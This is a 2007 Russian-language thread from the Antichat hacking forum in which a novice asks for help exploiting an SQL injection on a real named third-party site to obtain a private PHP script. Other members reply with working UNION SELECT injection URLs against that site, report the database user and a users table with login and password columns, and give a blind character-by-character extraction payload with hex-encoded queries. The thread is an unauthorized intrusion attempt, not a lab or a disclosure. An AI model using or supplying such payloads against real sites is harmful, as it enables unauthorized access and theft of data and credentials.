ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Требуется помощь по SQL-Inj
  #1  
Старый 17.03.2007, 17:54
Аватар для Navern
Navern
Новичок
Регистрация: 30.01.2007
Сообщений: 17
Провел на форуме:
52018

Репутация: 2
По умолчанию Требуется помощь по SQL-Inj

Есть один сайт, на котором один очень нужный мне в личных целях пхп-скрипт. В паблике его нет и таких скриптов в интернете можно пересчитать по пальцам одной руки. В общем, нужная штука. На одном из сайтов, где такой скрипт имеется, я набрёл на SQL-инъекцию. Мой опыт в таких делах примерно соизмерим с уровнем обычного лесного дерева, но я взялся за дело.

В общем, при неверной обработке запроса в одном из скриптов сайт начал меня материть SQL-ошибками. Я почитал здесь на форуме несколько статей и сотворил примерно следущее:

Код:
http://smurf1.free.fr/go.php?lien=-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null--
Но во всех статьях сказано, что при правильном подборе количества столбцов должна открыться обычная страница, у которой все поля будут пустыми. Тут я и тормознул. Количество столбцов правильное, а вот страница не открывается. Просто другая SQL-ошибка. Про это ничего в статьях не написано.

Протолкните меня кто-нибудь дальше по "процессу", а? Буду премного благодарен.
 
Ответить с цитированием

  #2  
Старый 17.03.2007, 18:15
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Там такая хрень там 2 запроса идут подряд, первый запрос идёт с SELECT , а второй идёт с UPDATE . Т.к. UNION можно юзать тока с SELECT, а с UPDATE нельзя, поэтому он на UPDATE выплёвывает ошибку запроса. Тебе поможет посимвольный брут)
http://injection.rulezz.ru/mysql_char_brute.html

user()
smurf1@172.20.244.229

http://smurf1.free.fr/go.php?lien=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/*

две таблицы users (колонки login и pass) и user
__________________

Последний раз редактировалось +toxa+; 17.03.2007 в 18:24..
 
Ответить с цитированием

  #3  
Старый 17.03.2007, 18:35
Аватар для Navern
Navern
Новичок
Регистрация: 30.01.2007
Сообщений: 17
Провел на форуме:
52018

Репутация: 2
По умолчанию

Ай андестуд насынг, как говорила моя первая учительница английского языка.

Объясни пожалуйста, откуда ты взял smurf1@172.20.244.229 и почему по ссылке http://smurf1.free.fr/go.php?lien=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* у меня открывается ни много, ни мало та же самая страница, что и час назад?
 
Ответить с цитированием

  #4  
Старый 17.03.2007, 18:38
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Изучай http://injection.rulezz.ru/

в smurf1@172.20.244.229 это когда я попробовал вытащить чё-нить из mysql.users он мне показал что у меня прав нет

upd

http://smurf1.free.fr/go.php?lien=1+and+ascii(substring(0x73656c65637420 6c6f67696e2066726f6d207573657273,1,1))=115/* и далее...
__________________

Последний раз редактировалось +toxa+; 17.03.2007 в 18:52..
 
Ответить с цитированием

  #5  
Старый 18.03.2007, 19:50
Аватар для Navern
Navern
Новичок
Регистрация: 30.01.2007
Сообщений: 17
Провел на форуме:
52018

Репутация: 2
По умолчанию

0x73656c65637420 6c6f67696e2066726f6d207573657273

Совсем не понимаю, что это такое? Понимаю, что что-то закодировано в ascii, но что? И, главное, зачем? (это я так пытаюсь походу осилить посимвольный брут)
 
Ответить с цитированием

  #6  
Старый 18.03.2007, 20:08
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

73 65 6c 65 63 74 20 6c 6f 67 69 6e 20 66 72 6f 6d 20 75 73 65 72 73
hex
 
Ответить с цитированием

  #7  
Старый 18.03.2007, 20:10
Аватар для Navern
Navern
Новичок
Регистрация: 30.01.2007
Сообщений: 17
Провел на форуме:
52018

Репутация: 2
По умолчанию

Час от часу не легче...

Последний раз редактировалось Navern; 23.03.2007 в 03:03..
 
Ответить с цитированием

  #8  
Старый 18.03.2007, 20:53
Аватар для ssk.ex0.uf0
ssk.ex0.uf0
Познающий
Регистрация: 27.02.2007
Сообщений: 89
Провел на форуме:
1141192

Репутация: 195
Отправить сообщение для ssk.ex0.uf0 с помощью ICQ
По умолчанию

Цитата:
73 65 6c 65 63 74 20 6c 6f 67 69 6e 20 66 72 6f 6d 20 75 73 65 72 73
я дурак? или действительно из HEX будет верно "select login from users" чё к чему? не пойму...
сорри...тремя топиками выше не прочитал...извинтиляюсь...

Последний раз редактировалось ssk.ex0.uf0; 18.03.2007 в 21:04..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ